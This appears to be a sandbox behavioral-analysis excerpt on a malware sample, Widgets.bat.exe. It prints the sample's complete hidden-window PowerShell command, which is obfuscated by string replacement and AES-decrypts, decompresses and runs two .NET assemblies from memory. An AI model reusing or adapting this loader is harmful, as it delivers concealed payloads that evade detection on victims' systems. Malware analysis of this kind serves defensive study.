Behavioral Analysis

Widgets.bat.exe "C:\Users\test22\AppData\Local\Temp\Widgets.bat.exe" -w hidden -c $TXfY='ReaLBTjdLLBTjinLBTjesLBTj'.Replace('LBTj', '');$TIFx='TrLBTjaLBTjnsfLBTjorLBTjmFiLBTjnLBTjalBlLBTjocLBTjkLBTj'.Replace('LBTj', '');$dnCj='ChaLBTjngeELBTjxtenLBTjsioLBTjnLBTj'.Replace('LBTj', '');$geEm='EleLBTjmeLBTjntLBTjAtLBTj'.Replace('LBTj', '');$wHCj='FrLBTjomLBTjBaseLBTj64SLBTjtLBTjrLBTjiLBTjnLBTjgLBTj'.Replace('LBTj', '');$AqWy='InLBTjvoLBTjkLBTjeLBTj'.Replace('LBTj', '');$CrqW='CrLBTjeatLBTjeDecLBTjryLBTjptoLBTjrLBTj'.Replace('LBTj', '');$khtm='GeLBTjtCLBTjuLBTjrrLBTjentPLBTjrocLBTjessLBTj'.Replace('LBTj', '');$KwrX='EnLBTjtryLBTjPoLBTjiLBTjntLBTj'.Replace('LBTj', '');$fieb='LLBTjoaLBTjdLBTj'.Replace('LBTj', '');$HiPp='SLBTjplLBTjitLBTj'.Replace('LBTj', '');$vlrA='MLBTjaiLBTjnModLBTjulLBTjeLBTj'.Replace('LBTj', '');function fRRPh($DnQua){$CjZvd=[System.Security.Cryptography.Aes]::Create();$CjZvd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CjZvd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CjZvd.Key=[System.Convert]::$wHCj('1miXrhhJhMlPNZf234BClG8WEdSEXKgCHPhV8YIU61Y=');$CjZvd.IV=[System.Convert]::$wHCj('KhKlhfyzOoIJAJ+933W5sA==');$baAva=$CjZvd.$CrqW();$hPGap=$baAva.$TIFx($DnQua,0,$DnQua.Length);$baAva.Dispose();$CjZvd.Dispose();$hPGap;}function uDQIQ($DnQua){$FXPtQ=New-Object System.IO.MemoryStream(,$DnQua);$rDgyg=New-Object System.IO.MemoryStream;$oYczS=New-Object System.IO.Compression.GZipStream($FXPtQ,[IO.Compression.CompressionMode]::Decompress);$oYczS.CopyTo($rDgyg);$oYczS.Dispose();$FXPtQ.Dispose();$rDgyg.Dispose();$rDgyg.ToArray();}$ZZlcK=[System.Linq.Enumerable]::$geEm([System.IO.File]::$TXfY([System.IO.Path]::$dnCj([System.Diagnostics.Process]::$khtm().$vlrA.FileName, $null)), 1);$ypoNV=$ZZlcK.Substring(2).$HiPp(':');$hFCAj=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[0])));$WShQc=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[1])));[System.Reflection.Assembly]::$fieb([byte[]]$WShQc).$KwrX.$AqWy($null,$null);[System.Reflection.Assembly]::$fieb([byte[]]$hFCAj).$KwrX.$AqWy($null,$null);